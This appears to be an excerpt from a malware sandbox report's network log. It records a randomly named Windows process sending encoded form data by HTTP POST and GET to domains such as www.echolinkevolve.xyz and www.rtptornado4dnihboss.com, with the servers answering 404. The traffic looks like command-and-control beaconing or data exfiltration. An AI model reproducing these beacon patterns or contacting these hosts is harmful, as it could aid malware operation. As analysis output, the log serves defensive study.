                                                                                                                              Data Raw: 54 5a 64 3d 6a 41 4b 47 78 38 58 74 34 42 38 6a 70 37 6b 50 74 34 76 50 46 49 2b 64 51 37 70 4f 31 53 78 58 63 47 64 4f 35 58 4a 4d 4f 78 58 77 6e 4c 45 50 6b 39 54 58 77 41 6a 39 31 4f 78 72 6b 47 46 45 75 6c 56 68 77 6b 45 51 73 43 56 5a 4f 63 6b 64 51 70 70 54 75 32 34 66 7a 4c 32 67 71 4f 58 51 57 46 31 55 4d 6a 59 76 32 76 4d 4c 6d 7a 49 51 54 58 42 32 45 42 58 39 56 49 74 2f 76 75 70 50 6a 6a 4f 63 63 4a 38 59 4c 39 5a 41 38 49 78 6d 51 50 6d 74 4b 75 75 46 53 71 77 42 53 59 41 68 47 47 65 55 51 37 77 31 56 6c 34 4d 74 50 45 6c 76 2f 58 57 77 41 4e 6f 6c 2b 59 62 58 79 39 32 70 43 57 63 58 53 6b 54 2b 2f 46 6f 46 49 64 64 57 6a 61 4d 53 42 41 2f 4c 58 4b 2b 64 4b 44 50 6d 37 58 53 68 30 32 61 57 74 67 39 54 73 6c 77 46 49 59 37 61 69 30 34 73 46 4c 4d 74 6c 2b 62 34 78 38 58 6c 70 44 35 73 67 61 43 31 33 55 69 43 53 58 42 37 45 48 30 45 76 61 66 56 74 39 52 54 46 4b 34 7a 59 4b 51 38 6d 55 72 36 65 62 35 6c 75 65 35 74 56 76 74 71 51 6e 4c 46 53 70 67 36 33 46 5a 58 71 78 7a 67 35 73 43 39 55 58 54 2b 4a 4c 30 65 49 2f 31 5a 61 7a 4b 32 74 6c 34 77 61 49 43 72 38 64 4d 31 57 30 50 6f 79 4e 4c 64 30 44 6e 41 79 69 70 77 33 51 36 63 2f 70 57 57 6b 63 4b 33 74 66 62 67 65 50 56 32 41 67 6d 47 70 73 41 6d 33 52 75 66 58 53 63 76 41 4c 32 65 63 35 47 71 43 74 36 54 6a 6f 51 70 71 42 63 33 70 32 54 78 4d 78 69 41 76 35 35 74 59 65 4b 69 56 77 5a 4e 59 5a 2b 73 61 71 54 56 48 34 64 47 57 33 78 32 6b 31 5a 33 6a 47 58 67 6f 54 71 2b 36 54 4f 72 31 68 6d 6b 50 5a 4e 72 4b 6b 47 65 47 71 54 47 58 38 71 59 34 6b 6c 63 37 41 72 69 46 69 39 79 56 6d 71 2f 74 73 54 76 34 4a 33 39 39 63 53 33 73 6b 39 71 4b 6e 38 47 56 62 50 62 7a 39 37 7a 53 51 51 30 52 43 71 4e 66 50 48 45 54 59 4a 4b 72 61 33 42 61 67 74 45 64 4a 42 64 6c 6b 43 51 6c 2f 4e 7a 4b 70 62 78 39 55 35 58 65 72 57 4e 32 47 67 6b 46 74 45 31 6e 2f 73 36 70 6e 65 61 41 46 2f 36 54 70 59 53 2f 72 47 41 64 4b 6d 62 5a 36 31 76 6f 4b 6f 4d 64 64 36 5a 48 44 41 7a 62 37 69 6f 78 76 4b 79 2b 38 52 43 7a 41 4a 76 6b 61 6f 6d 56 31 6a 74 61 38 45 72 6d 51 45 62 4d 56 55 32 65 39 62 31 64 38 47 41 32 36 30 46 62 64 75 57 79 5a 64 4c 59 4e 30 5a 2f 5a 53 42 42 41 48 56 4e 64 77 4e 6d 4b 52 4b 57 53 5a 44 48 48 35 70 6a 4f 6b 67 4c 34 49 68 7a 67 4c 69 78 63 48 4d 31 75 39 5a 74 34 4a 68 41 73 7a 6a 37 76 45 48 62 51 64 30 76 53 76 49 62 46 4e 47 57 7a 66 77 66 74 41 46 35 48 46 73 6d 35 2b 55 36 4e 41 6e 56 76 65 61 39 41 6d 44 69 73 4b 58 41 61 37 71 50 58 67 77 41 58 52 39 77 57 53 50 32 6f 5a 70 71 4c 68 30 59 36 30 65 4c 4e 2b 61 4e 71 34 37 76 35 47 73 59 56 73 6c 4e 6c 71 50 6a 35 62 4f 4d 6e 42 75 44 48 52 76 4a 72 79 48 70 2b 62 79 56 37 32 54 55 53 72 6c 76 67 77 71 76 42 4a 2b 51 30 48 34 4d 34 47 43 32 43 6c 69 43 41 56 4a 4d 36 42 2b 52 59 64 4d 47 69 70 31 52 64 35 4d 44 38 36 53 62 49 33 6c 52 30 49 38 70 63 7a 31 77 65 52 57 52 54 52 47 4a 58 59 68 4c 52 41 30 4c 38 6c 43 4b 39 4a 67 7a 73 7a 43 4a 2b 77 4b 52 4b 71 4f 30 53 5a 45 4f 54 73 6c 6c 79 6a 78 36 47 6e 71 6b 77 4d 37 68 48 41 68 77 78 67 61 78 77 4f 72 47 59 43 6c 68 6d 37 70 53 77 62 77 77 37 53 6a 48 62 70 51 46 69 4b 72 32 2b 4f 4f 45 42 30 56 71 50 44 4e 55 62 78 71 6d 69 2f 79 6a 35 79 57 32 66 57 43 73 39 62 32 6d 55 39 39 51 36 4a 76 33 4e 76 2f 4f 5a 33 4f 68 35 2f 64 37 59 7a 30 72 4c 61 66 64 6e 38 4b 43 57 41 61 59 32 67 52 50 33 38 57 67 6d 6a 79 68 31 4c 2b 35 72 58 6c 6e 43 63 30 32 48 76 37 2f 6f 68 66 66 6a 77 62 44 6c 37 69 47 49 38 48 33 4a 64 50 42 70 5a 71 5a 65 30 52 55 78 76 56 2b 61 39 42 54 6e 52 43 49 55 68 49 38 44 69 54 6f 30 4f 36 4c 45 70 4a 44 69 55 4d 50 64 69 59 4e 50 6a 43 38 66 6a 7a 67 66 66 39 70 6b 53 33 79 6a 54 63 65 43 46 50 66 66 72 41 4b 6e 78 39 56 6e 53 66 6d 44 74 51 52 43 2b 4d 71 66 34 5a 62 2b 49 32 6b 63 77 38 62 36 77 30 79 71 70 74 43 65 42 38 39 34 79 61 62 6d 64 7a 48 36 6e 5a 46 6f 4a 74 57 73 56 4a 62 31 36 4f 6b 4e 44 4b 4a 36 69 64 51 51 47 54 52 4d 50 6a 46 33 4c 79 67 74 4d 47 48 53 62 6b 61 74 4a 39 35 37 53 57 67 39 42 56 45 30 46 48 50 73 39 63 70 5a 34 5a 39 71 48 50 74 4c 48 6b 72 42 41 6c 6c 4b 69 33 54 6e 56 65 6a 32 48 47 77 2f
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:27:22.839776039 CET2626OUTData Raw: 62 78 49 79 39 6f 78 30 62 70 6c 49 5a 37 38 47 33 4c 57 47 4a 4d 72 68 4c 51 75 41 7a 41 52 76 39 54 4d 78 49 54 68 66 6b 30 73 44 2b 67 72 75 76 76 6d 76 51 65 33 75 79 45 2b 77 6a 5a 78 7a 62 76 4e 76 6b 45 4a 4a 77 32 6e 56 48 46 38 52 77 33
                                                                                                                              Data Ascii: bxIy9ox0bplIZ78G3LWGJMrhLQuAzARv9TMxIThfk0sD+gruvvmvQe3uyE+wjZxzbvNvkEJJw2nVHF8Rw32dG3ogWW7zC4o4crDDvQOFQENnHoyoHfs6Hha2VqLFvHn84fsx9Bgm9K2jaleHn4TT0nG4DIAF/E/Qvnet9IjrUGlJGIQvZuf45bJOptrSZohxvNZWIEWYdXmNRBj/SMY0a29nZbw7BrlXwlEbApo7S9LAtmMZxPv
                                                                                                                              Dec 4, 2023 15:27:22.839951038 CET19344OUTData Raw: 56 51 75 64 54 6a 2f 49 49 72 75 75 67 76 6d 4e 36 34 39 64 4d 35 44 47 54 66 37 61 35 2b 55 6d 4a 50 7a 73 30 5a 55 63 58 33 79 6e 37 43 38 4b 67 4b 48 63 59 4d 2f 38 47 6b 4e 45 70 6e 48 71 34 49 6e 75 38 6c 6f 72 6a 38 30 7a 36 76 57 49 4b 6e
                                                                                                                              Data Ascii: VQudTj/IIruugvmN649dM5DGTf7a5+UmJPzs0ZUcX3yn7C8KgKHcYM/8GkNEpnHq4Inu8lorj80z6vWIKnyr+9zfGBPx7xKk0tUKScVAuXF/oemyMCmYrRCxmgv8IKnZKq3TbApXlb8MVOXYl+a7BnSDG/XBhNJS26yCSkgmBbGSAimc23rcnc3cWahl86nibgDgEk3lGBgNu88QNlnxwR6YnjN0kOqCwGdWc73PIrYmbgVqIzR
                                                                                                                              Dec 4, 2023 15:27:22.840095043 CET3912OUTData Raw: 34 31 59 47 50 45 77 6c 46 64 32 4a 5a 59 30 74 53 4b 44 39 77 78 6b 4e 7a 66 62 79 59 5a 44 77 42 44 73 41 31 2b 34 4d 68 38 4a 64 4d 63 38 76 6d 42 2b 61 69 39 52 38 75 57 77 79 6b 4c 55 53 31 41 46 70 75 2f 39 31 78 76 4c 49 73 57 47 64 43 57
                                                                                                                              Data Ascii: 41YGPEwlFd2JZY0tSKD9wxkNzfbyYZDwBDsA1+4Mh8JdMc8vmB+ai9R8uWwykLUS1AFpu/91xvLIsWGdCWEsUbXcryQ2qrxqx3zUiQ1Qk7OTOo8JEHT5Hvh25c3p4agPJD2W2uUvdH6i4wHNcUXvbT+wtYa9eF0ge6gUgad3Lbl1IPGt59c5i2Xbmo0bEV+DKrrbv5W9DwSZRwsQoQj0j/1raGJpPVLmJ6TlrSwxK7EdU6ESbKd
                                                                                                                              Dec 4, 2023 15:27:23.015940905 CET5198OUTData Raw: 64 77 31 57 56 4a 41 76 57 31 35 5a 57 6e 70 58 61 46 43 33 33 31 66 38 38 54 5a 41 56 76 33 70 4d 69 71 75 49 41 77 70 57 48 50 32 2b 4f 4d 34 64 6e 4a 73 34 44 32 55 78 41 6b 7a 6d 6f 32 50 7a 57 4b 56 59 73 65 35 7a 65 6f 77 77 43 4c 67 73 6b
                                                                                                                              Data Ascii: dw1WVJAvW15ZWnpXaFC331f88TZAVv3pMiquIAwpWHP2+OM4dnJs4D2UxAkzmo2PzWKVYse5zeowwCLgsk/Yz+1a6NI9rO+Kbgv7Fk/bKappQELiNtBLv1waP/3jRKLkNXtEe45dVQQRCC3Ft9Zuchx2wWynMmRp42unamCQ7eAW3yqm0g35v5Cj3fm8ovefk1yT0LbtnNUUjVA+sOUr/TF8wcUdopa8JJMPUNnNfqwVoL2HQ7j
                                                                                                                              Dec 4, 2023 15:27:23.016134024 CET5198OUTData Raw: 48 30 57 54 69 4b 75 68 67 2b 56 63 68 75 56 2b 4a 64 4a 78 51 30 37 2b 31 4d 72 47 61 62 59 4d 5a 42 6e 75 2f 68 65 56 33 78 73 4b 56 4d 41 32 52 61 41 69 73 66 4c 43 4a 33 46 36 47 6f 41 6b 49 56 38 38 4e 58 47 4b 34 34 54 4a 64 6a 49 61 37 58
                                                                                                                              Data Ascii: H0WTiKuhg+VchuV+JdJxQ07+1MrGabYMZBnu/heV3xsKVMA2RaAisfLCJ3F6GoAkIV88NXGK44TJdjIa7XdJciiBedMscmNAWDBiZ7daDGT/phThk5SHTT4h6+Uo1A/QQkep2Gzg8QHJ3+RkqAD1MuDyRuDj86aiZvbTk4Fu4uAa1jIwnqUNxSRYz261AornCa3HvZVd1p5giz9W1WWyQKMqsUc7uZz76PFTJImcu58qHZzI71+
                                                                                                                              Dec 4, 2023 15:27:23.016602039 CET2626OUTData Raw: 67 6c 62 55 4c 54 76 69 53 71 38 4b 32 2b 30 48 39 61 6a 2b 64 65 38 51 72 78 6a 41 57 58 52 42 6a 6f 78 50 6d 6f 4d 76 43 64 70 41 56 42 45 56 46 44 70 6a 55 48 43 77 39 41 52 53 45 30 6b 36 45 67 6d 4c 36 70 62 65 46 2f 4e 76 4a 67 4d 57 63 6c
                                                                                                                              Data Ascii: glbULTviSq8K2+0H9aj+de8QrxjAWXRBjoxPmoMvCdpAVBEVFDpjUHCw9ARSE0k6EgmL6pbeF/NvJgMWclfj52yT1IoD8WSm777rvMjAXUfjLrFF2Cak+NDTZDdbD2zj5Ismy+n7O776cNXolBPQBfMK++mrphN3yGvNPUFOAR5oE9I4ZaFsKR7TuJfXYRdHyKbITQtEe7DxbycChQqYlEPaKyB39BM1A6msGBLWaniCHWbCvXU
                                                                                                                              Dec 4, 2023 15:27:23.016760111 CET2116OUTData Raw: 64 6f 6e 32 44 62 4d 75 4c 54 39 64 4b 74 70 65 63 66 4c 7a 36 6d 47 34 44 30 71 5a 41 69 34 70 30 33 78 53 31 2b 77 6a 48 62 37 2f 43 70 4e 56 6a 31 30 4d 30 62 75 62 77 79 6e 54 5a 2b 4f 62 4a 77 51 2b 65 36 66 6c 30 4e 69 4d 30 6c 6c 63 4c 71
                                                                                                                              Data Ascii: don2DbMuLT9dKtpecfLz6mG4D0qZAi4p03xS1+wjHb7/CpNVj10M0bubwynTZ+ObJwQ+e6fl0NiM0llcLqlYwk/5WdONhng0E+lZ5TcH03YzSbD+G/0NPey4wfmy/dXRkrz+VjfpVj1yuZR9fYwId7OfCGpvKU9mKO8E1p0L1Gn4l7mmmMZU73z1rvcoxQ2ARbuczYPs2H6iYFymsrMf/8zO/+PJg/M+S9U6eWEqnJC2FduUCkv
                                                                                                                              Dec 4, 2023 15:27:23.364418030 CET587INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:22 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              73192.168.11.2050204198.177.123.106808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:25.361690044 CET536OUTGET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:27:25.693751097 CET602INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:25 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              74192.168.11.2050205198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:30.868264914 CET834OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 34 45 70 2b 62 66 5a 64 6f 57 58 37 55 71 6f 2b 6a 4f 38 4d 44 34 73 64 55 50 61 62 58 33 54 37 6c 6b 6c 38 49 68 54 70 4b 38 75 6f 56 39 32 4b 4f 4c 48 57 73 55 2f 79 71 49 44 50 52 73 75 4e 54 43 76 63 76 32 54 37 57 44 75 52 2f 52 2f 54 67 50 52 52 4c 79 4b 43 55 62 39 35 62 6d 4d 48 67 7a 41 58 6a 6b 69 35 43 75 73 48 73 66 70 31 7a 52 58 57 58 72 66 54 42 49 66 31 2f 45 72 48 49 6e 73 7a 78 52 33 44 67 4d 2f 4d 4b 55 41 38 72 64 72 56 53 34 78 43 78 55 75 46 50 68 74 59 6a 62 4e 52 69 42 50 51 71 38 63 43 48 4f 4f 42 77 51 3d 3d
                                                                                                                              Data Ascii: TZd=4Ep+bfZdoWX7Uqo+jO8MD4sdUPabX3T7lkl8IhTpK8uoV92KOLHWsU/yqIDPRsuNTCvcv2T7WDuR/R/TgPRRLyKCUb95bmMHgzAXjki5CusHsfp1zRXWXrfTBIf1/ErHInszxR3DgM/MKUA8rdrVS4xCxUuFPhtYjbNRiBPQq8cCHOOBwQ==
                                                                                                                              Dec 4, 2023 15:27:31.034743071 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:30 GMT
                                                                                                                              server: LiteSpeed
